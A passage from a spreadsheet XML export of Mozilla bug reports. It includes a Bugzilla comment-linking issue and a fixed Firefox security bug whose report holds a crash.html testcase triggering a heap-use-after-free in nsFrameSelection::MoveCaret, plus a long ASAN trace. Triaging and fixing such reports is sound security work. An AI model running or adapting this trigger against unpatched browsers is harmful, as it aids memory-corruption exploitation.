          <t>2012-12-18 20:46:21 -0800</t>
        </is>
      </c>
      <c r="E5945" t="n">
        <v>1</v>
      </c>
      <c r="F5945" t="n">
        <v>1</v>
      </c>
      <c r="G5945" t="n">
        <v>4</v>
      </c>
      <c r="H5945" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5945" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5945" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K5945" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5945" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5945" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N5945" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5945" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5945" t="inlineStr"/>
      <c r="Q5945" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5945" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S5945" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T5945" t="n">
        <v>1</v>
      </c>
      <c r="U5945" t="n">
        <v>0</v>
      </c>
      <c r="V5945" t="n">
        <v>15</v>
      </c>
      <c r="W5945" t="inlineStr">
        <is>
          <t>Some bugzilla users attempt to include HTML tags in their posts, for example, 
to link to another bug.  They probably do this because they're used to slashdot-
style linking, and assume that the automatic "Bug #10000" links in other 
people's posts are actually manual links.  The problem isn't that bugzilla 
doesn't allow HTML posts, but that it messes up both the manual link and the 
automatic link (if the anchor text is like "Bug #10000") in this case so that 
other users must type the bug number manually (the horror :)
Bug #31322 shows a few test cases and the results.
Actual results: Bugzilla includes the &gt; in the href and the anchor as part of 
the URL.
Expected results: Link URL is underlined correctly (so it's clickable) but all 
tags are still shown as typed (so pasted html isn't destroyed).  Anchors that 
are bug numbers are also linked to the bug number they refer to.
Related:
Bug #31323, bugzilla should warn users not to use html tags to format messages
Bug #17452, RFE to allow bugzilla comments to be in html format (which probably 
won't be done)</t>
        </is>
      </c>
      <c r="X5945" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5946">
      <c r="A5946" t="n">
        <v>1322107</v>
      </c>
      <c r="B5946" t="inlineStr">
        <is>
          <t>2016-12-05 02:07:32 -0800</t>
        </is>
      </c>
      <c r="C5946" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsFrameSelection::MoveCaret</t>
        </is>
      </c>
      <c r="D5946" t="inlineStr">
        <is>
          <t>2024-05-30 09:24:07 -0700</t>
        </is>
      </c>
      <c r="E5946" t="n">
        <v>1</v>
      </c>
      <c r="F5946" t="n">
        <v>1</v>
      </c>
      <c r="G5946" t="n">
        <v>3</v>
      </c>
      <c r="H5946" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5946" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5946" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5946" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5946" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5946" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5946" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5946" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5946" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main51+][adv-esr45.7+]</t>
        </is>
      </c>
      <c r="Q5946" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5946" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5946" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T5946" t="n">
        <v>1</v>
      </c>
      <c r="U5946" t="n">
        <v>0</v>
      </c>
      <c r="V5946" t="n">
        <v>19</v>
      </c>
      <c r="W5946" t="inlineStr">
        <is>
          <t>The latest ASAN build of Firefox (BuildID=20161204150411) crashes as follows when loading the testcase.
crash.html:
&lt;script&gt;
function start() {
        o6=document.createElement('iframe');
        o38=document.createElement('th');
        o43=document.createElement('th');
        o94=document.createRange();
        try{while(document.removeChild(document.firstChild));}catch(e){}
        o105=document.implementation.createHTMLDocument();
        o105.body.appendChild(o6);
        document.appendChild(o105.documentElement);
        o121=frames[0];
        o122=o121.document;
        o122.documentElement.appendChild(o38);
        o171=o121.getSelection();
        document.documentElement.appendChild(o43);
        o38.innerHTML="&lt;svg id&gt;&lt;animate attributeName='dominant-baseline'&gt;";
        o171.addRange(o94);
        o171.modify('move', 'forward','lineboundary');
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==24239==ERROR: AddressSanitizer: heap-use-after-free on address 0x6170001a959b at pc 0x7fd6f8c533e2 bp 0x7ffcde0bc590 sp 0x7ffcde0bc588
READ of size 2 at 0x6170001a959b thread T0 (Web Content)
    #0 0x7fd6f8c533e1 in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4171:27
    #1 0x7fd6f905bef5 in nsFrameSelection::MoveCaret(nsDirection, bool, nsSelectionAmount, nsFrameSelection::CaretMovementStyle) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:970:3
    #2 0x7fd6f908abbd in mozilla::dom::Selection::Modify(nsAString_internal const&amp;, nsAString_internal const&amp;, nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6420:8
    #3 0x7fd6f5acc819 in mozilla::dom::SelectionBinding::modify(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Selection*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/SelectionBinding.cpp:710:3
    #4 0x7fd6f67e9f30 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2879:13
    #5 0x7fd6fcbf885c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #6 0x7fd6fcbf885c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:457
    #7 0x7fd6fcbf9192 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:10
    #8 0x7fd6fc959eac in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #9 0x7fd6fc92941f in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #10 0x7fd6fc936b9f in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #11 0x7fd6fc93934e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #12 0x7fd6fcbf8913 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #13 0x7fd6fcbf8913 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:445
    #14 0x7fd6fcbd8bf5 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:508:12
    #15 0x7fd6fcbd8bf5 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2919
    #16 0x7fd6fcbbd746 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:403:12
    #17 0x7fd6fcbf8adc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:475:15
    #18 0x7fd6fcbf9192 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:10
    #19 0x7fd6fc6ce06d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2830:12
    #20 0x7fd6f61fbf1f in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #21 0x7fd6f6c4fa81 in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #22 0x7fd6f6c4fa81 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #23 0x7fd6f6c1975d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1133:16
    #24 0x7fd6f6c1b1a9 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
    #25 0x7fd6f6c057f3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:463:5
    #26 0x7fd6f6c09154 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:820:9
    #27 0x7fd6f8d52939 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1024:7
    #28 0x7fd6f9bd218e in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7583:5
    #29 0x7fd6f9bcdfd4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7387:7
    #30 0x7fd6f9bd564f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7284:13
    #31 0x7fd6f3e09500 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
    #32 0x7fd6f3e08498 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
    #33 0x7fd6f3e051ff in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #34 0x7fd6f3e072f4 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
    #35 0x7fd6f3e07eac in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
    #36 0x7fd6f230c91b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #37 0x7fd6f4decf8b in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8624:7
    #38 0x7fd6f4e9a44f in nsUnblockOnloadEvent::Run() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8577:5
    #39 0x7fd6f212966b in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1213:7
    #40 0x7fd6f21ad53c in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:381:10
    #41 0x7fd6f2f5451f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #42 0x7fd6f2ec27c8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #43 0x7fd6f2ec27c8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #44 0x7fd6f2ec27c8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #45 0x7fd6f8529bdf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #46 0x7fd6fa712e57 in XRE_RunAppShell /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:924:12
    #47 0x7fd6f2ec27c8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #48 0x7fd6f2ec27c8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #49 0x7fd6f2ec27c8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #50 0x7fd6fa7121a7 in XRE_InitChildProcess /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:756:7
    #51 0x4dfb5b in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:115:19
    #52 0x4dfb5b in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:438
    #53 0x7fd70d23d82f in __libc_start_main /build/glibc-Qz8a69/glibc-2.23/csu/../csu/libc-start.c:291
    #54 0x41ba38 in _start (/home/nils/MonkeyFarm/firefox/firefox+0x41ba38)
0x6170001a959b is located 283 bytes inside of 752-byte region [0x6170001a9480,0x6170001a9770)
freed by thread T0 (Web Content) here:
    #0 0x4b218b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7fd6f8c2fcd4 in mozilla::PresShell::Release() /home/worker/workspace/build/src/layout/base/PresShell.cpp:837:1
    #2 0x7fd6f8c52f26 in ~nsCOMPtr_base /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:294:7
    #3 0x7fd6f8c52f26 in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4165
    #4 0x7fd6f905bef5 in nsFrameSelection::MoveCaret(nsDirection, bool, nsSelectionAmount, nsFrameSelection::CaretMovementStyle) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:970:3
    #5 0x7fd6f908abbd in mozilla::dom::Selection::Modify(nsAString_internal const&amp;, nsAString_internal const&amp;, nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6420:8
    #6 0x7fd6f5acc819 in mozilla::dom::SelectionBinding::modify(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Selection*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/SelectionBinding.cpp:710:3
    #7 0x7fd6f67e9f30 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2879:13
    #8 0x7fd6fcbf885c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #9 0x7fd6fcbf885c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:457
    #10 0x7fd6fcbf9192 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:10
    #11 0x7fd6fc959eac in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #12 0x7fd6fc92941f in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #13 0x7fd6fc936b9f in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #14 0x7fd6fc93934e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #15 0x7fd6fcbf8913 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #16 0x7fd6fcbf8913 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:445
    #17 0x7fd6fcbd8bf5 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:508:12
    #18 0x7fd6fcbd8bf5 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2919
    #19 0x7fd6fcbbd746 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:403:12
    #20 0x7fd6fcbf8adc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:475:15
    #21 0x7fd6fcbf9192 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:10
    #22 0x7fd6fc6ce06d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2830:12
    #23 0x7fd6f61fbf1f in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #24 0x7fd6f6c4fa81 in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #25 0x7fd6f6c4fa81 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #26 0x7fd6f6c1975d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1133:16
    #27 0x7fd6f6c1b1a9 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
    #28 0x7fd6f6c057f3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:463:5
    #29 0x7fd6f6c09154 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:820:9
    #30 0x7fd6f8d52939 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1024:7
    #31 0x7fd6f9bd218e in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7583:5
    #32 0x7fd6f9bcdfd4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7387:7
    #33 0x7fd6f9bd564f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7284:13
    #34 0x7fd6f3e09500 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
previously allocated by thread T0 (Web Content) here:
    #0 0x4b24ab in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0d9d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7fd6f4db0358 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7fd6f4db0358 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/PresShell.h:87
    #4 0x7fd6f4db0358 in nsDocument::doCreateShell(nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:3605
    #5 0x7fd6f70611a7 in nsHTMLDocument::CreateShell(nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:275:10
    #6 0x7fd6f8d4b8d1 in nsDocumentViewer::InitPresentationStuff(bool) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:660:16
    #7 0x7fd6f8d4b1b8 in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, bool, bool, bool) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:915:10
    #8 0x7fd6f8d4a317 in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:644:10
    #9 0x7fd6f9bcb732 in nsDocShell::SetupNewViewer(nsIContentViewer*) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9351:7
    #10 0x7fd6f9bc9e39 in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7208:17
    #11 0x7fd6f9bd862a in nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIURI*, bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8064:14
    #12 0x7fd6f9b77003 in nsDocShell::EnsureContentViewer() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7933:17
    #13 0x7fd6f9babb77 in GetDocument /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:4523:3
    #14 0x7fd6f9babb77 in non-virtual thunk to nsDocShell::GetDocument() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:4521
    #15 0x7fd6f4b1d983 in MaybeCreateDoc /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3821:38
    #16 0x7fd6f4b1d983 in GetDoc /home/worker/workspace/build/src/obj-firefox/dist/include/nsPIDOMWindow.h:185
    #17 0x7fd6f4b1d983 in EnsureInnerWindow /home/worker/workspace/build/src/obj-firefox/dist/include/nsPIDOMWindow.h:888
    #18 0x7fd6f4b1d983 in WrapObject /home/worker/workspace/build/src/dom/base/nsGlobalWindow.h:305
    #19 0x7fd6f4b1d983 in non-virtual thunk to nsGlobalWindow::WrapObject(JSContext*, JS::Handle&lt;JSObject*&gt;) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.h:303
    #20 0x7fd6f391c69c in XPCConvert::NativeInterface2JSObject(JS::MutableHandle&lt;JS::Value&gt;, nsIXPConnectJSObjectHolder**, xpcObjectHelper&amp;, nsID const*, bool, nsresult*) /home/worker/workspace/build/src/js/xpconnect/src/XPCConvert.cpp:784:16
    #21 0x7fd6f391a5b3 in XPCConvert::NativeData2JS(JS::MutableHandle&lt;JS::Value&gt;, void const*, nsXPTType const&amp;, nsID const*, nsresult*) /home/worker/workspace/build/src/js/xpconnect/src/XPCConvert.cpp:344:16
    #22 0x7fd6f39c6332 in GatherAndConvertResults /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1600:18
    #23 0x7fd6f39c6332 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1394
    #24 0x7fd6f39c6332 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1350
    #25 0x7fd6f39cd7af in GetAttribute /home/worker/workspace/build/src/js/xpconnect/src/xpcprivate.h:1877:17
    #26 0x7fd6f39cd7af in XPC_WN_GetterSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1179
    #27 0x7fd6fcbf885c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #28 0x7fd6fcbf885c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:457
    #29 0x7fd6fcc7c071 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:10
    #30 0x7fd6fcc7c071 in CallGetter /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:635
    #31 0x7fd6fcc7c071 in CallGetter(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::Shape*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1809
    #32 0x7fd6fcc06b3f in GetExistingProperty&lt;js::AllowGC::CanGC&gt; /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1857:10
    #33 0x7fd6fcc06b3f in NativeGetPropertyInline&lt;js::AllowGC::CanGC&gt; /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2084
    #34 0x7fd6fcc06b3f in NativeGetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2118
    #35 0x7fd6fcc06b3f in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1523
    #36 0x7fd6fcc06b3f in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:844
    #37 0x7fd6fcc06b3f in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4273
    #38 0x7fd6fcbdcbbc in GetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:192:12
    #39 0x7fd6fcbdcbbc in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2636
    #40 0x7fd6fcbbd746 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:403:12
    #41 0x7fd6fcbf8adc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:475:15
    #42 0x7fd6fcbf9192 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:10
